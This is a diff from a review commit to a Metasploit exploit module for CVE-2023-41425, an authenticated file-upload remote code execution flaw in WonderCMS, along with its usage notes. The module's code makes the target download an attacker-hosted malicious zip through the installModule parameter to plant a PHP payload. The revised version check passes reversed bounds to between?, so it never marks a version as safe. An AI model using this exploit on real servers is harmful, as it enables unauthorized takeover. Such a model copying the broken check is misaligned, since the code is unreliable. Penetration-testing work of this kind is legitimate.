Addressing comments

Author: msutovsky-r7

documentation/modules/exploit/multi/http/wondercms_rce.md

@@ -12,7 +12,7 @@
 1. Install the application
 2. Start msfconsole
 3. Do: `use multi/http/wondercms_rce`
-4. Do: `set PASSWORD [password]'
+4. Do: `set PASSWORD [password]`
 5. Do: `set LHOST [attacker IP]`
 6. Do: `set LPORT [attacker PORT]`
 4. Do: `run`
@@ -22,7 +22,7 @@
 
 ### PASSWORD
 
-WonderCMS generates one global password that gets generated upon first run of application. This is global admin password that controls the whole CMS. This password has to be used in the exploit to get authenticated access.
+WonderCMS uses a global password that generated at the application's first run. This is global admin password that controls the whole CMS. This password has to be used in the exploit to get authenticated access.
 
 ## Scenarios
 

modules/exploits/multi/http/wondercms_rce.rb

@@ -19,13 +19,18 @@ def initialize(info = {})
         info,
         'Name' => 'WonderCMS Remote Code Execution',
         'Description' => %q{
-          This module adds exploit for CVE-2023-41425. The WonderCMS is simple, free and open-source management system. It contains file upload vulnerability in version 3.2.0 up to version 3.4.2, which allows authenticated users to upload malicious zip file, which gets parsed into theme directory. This vulnerability can be used to upload malicious PHP file.
+          This module exploits CVE-2023-41425, an authenticated file upload vulnerability affecting WonderCMS between 3.2.0 and 3.4.2.
         },
         'License' => MSF_LICENSE,
-        'Author' => ['msutovsky-r7'],
+        'Author' => [
+          'msutovsky-r7', # msf module
+          'Milad "Ex3ptionaL" Karimi' # original exploit
+        ],
         'References' => [
           [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-41425'],
-          [ 'CVE', '2023-41425']
+          [ 'URL', 'https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413'],
+          [ 'CVE', '2023-41425'],
+          [ 'EDB', '52271']
         ],
         'Targets' => [
           [
@@ -79,7 +84,7 @@ def check
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, '/how-to')
     })
-    return Exploit::CheckCode::Unknown('Cannot connect to WonderCMS server') unless res&.code == 200
+    return Exploit::CheckCode::Unknown('Cannot connect to the remote host') unless res&.code == 200
 
     return Exploit::CheckCode::Safe('WonderCMS was not detected') unless res.body&.include?('WonderCMS')
 
@@ -96,13 +101,13 @@ def check
 
     html_document = res.get_html_document
 
-    html_document.xpath('//a').find { |link| link.text =~ /WonderCMS (\d.\d?\d?.\d?\d?)/ }
+    html_document.xpath('//a[@href="https://wondercms.com"]').find { |link| link.text =~ /WonderCMS (\d.\d?\d?.\d?\d?)/ }
 
     version = Rex::Version.new(Regexp.last_match(1))
 
     return Exploit::CheckCode::Unknown('Unable to get version') unless version
 
-    return Msf::Exploit::CheckCode::Safe("WonderCMS #{version} is not affected") unless version <= Rex::Version.new('3.4.2') && version >= Rex::Version.new('3.2.0')
+    return Msf::Exploit::CheckCode::Safe("WonderCMS #{version} is not affected") if version.between?(Rex::Version.new('3.4.2'), Rex::Version.new('3.2.0'))
 
     return Exploit::CheckCode::Vulnerable("Version #{version} is affected")
   end
@@ -138,7 +143,7 @@ def install_malicious_component
 
     send_request_cgi!({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "/?installModule=http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@zip_filename}&directoryName=violet&type=themes&token=#{@token}")
+      'uri' => normalize_uri(target_uri.path, "/?installModule=http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@zip_filename}&directoryName=#{Rex::Text.rand_text_alphanumeric(1..8)}&type=themes&token=#{@token}")
     })
   end